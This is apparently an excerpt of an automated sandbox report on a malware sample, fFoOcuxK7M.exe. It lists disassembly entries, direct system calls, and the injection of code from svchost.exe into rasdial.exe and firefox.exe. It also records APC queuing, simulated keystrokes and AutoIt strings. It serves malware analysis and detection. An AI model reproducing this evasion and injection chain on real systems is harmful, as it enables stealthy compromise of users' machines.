                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe, Code function: 0_2_001180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe, Code function: 0_2_000EA124 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe, Code function: 0_2_000EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtResumeThread: Direct from: 0x773836AC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtMapViewOfSection: Direct from: 0x77382D1C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtSetInformationThread: Direct from: 0x773763F9
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtCreateMutant: Direct from: 0x773835CC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtSetInformationProcess: Direct from: 0x77382C5C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtCreateUserProcess: Direct from: 0x7738371C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtQueryInformationProcess: Direct from: 0x77382C26
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtResumeThread: Direct from: 0x77382FBC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtAllocateVirtualMemory: Direct from: 0x77383C9C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtReadFile: Direct from: 0x77382ADC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtDelayExecution: Direct from: 0x77382DDC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtOpenSection: Direct from: 0x77382E0C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtQuerySystemInformation: Direct from: 0x773848CC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtReadVirtualMemory: Direct from: 0x77382E8C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtCreateKey: Direct from: 0x77382C6C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtAllocateVirtualMemory: Direct from: 0x773848EC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtQueryAttributesFile: Direct from: 0x77382E6C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtSetInformationThread: Direct from: 0x77382B4C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtTerminateThread: Direct from: 0x77382FCC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtQueryInformationToken: Direct from: 0x77382CAC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtOpenKeyEx: Direct from: 0x77382B9C
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtAllocateVirtualMemory: Direct from: 0x77382BEC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtDeviceIoControlFile: Direct from: 0x77382AEC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtCreateFile: Direct from: 0x77382FEC
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | NtOpenFile: Direct from: 0x77382DCC
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe protection: read write
                Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\rasdial.exe | Thread register set: target process: 1224
                Source: C:\Windows\SysWOW64\rasdial.exe | Thread APC queued: target process: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DA9008
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_001187B1 LogonUserW
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_000C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_000C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_00124C27 mouse_event
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\fFoOcuxK7M.exe"
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe | Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
                Source: C:\Windows\SysWOW64\rasdial.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_00117CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_0011874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: fFoOcuxK7M.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: TrOCMVbhcDRPP.exe, 00000006.00000002.3385169487.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000000.2378417014.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522083057.0000000001331000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
                Source: fFoOcuxK7M.exe, TrOCMVbhcDRPP.exe, 00000006.00000002.3385169487.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000000.2378417014.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522083057.0000000001331000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: TrOCMVbhcDRPP.exe, 00000006.00000002.3385169487.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000000.2378417014.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522083057.0000000001331000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: TrOCMVbhcDRPP.exe, 00000006.00000002.3385169487.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000000.2378417014.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522083057.0000000001331000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_000E862B cpuid
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_000F4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_00101E06 GetUserNameW
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exe | Code function: 0_2_000F3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
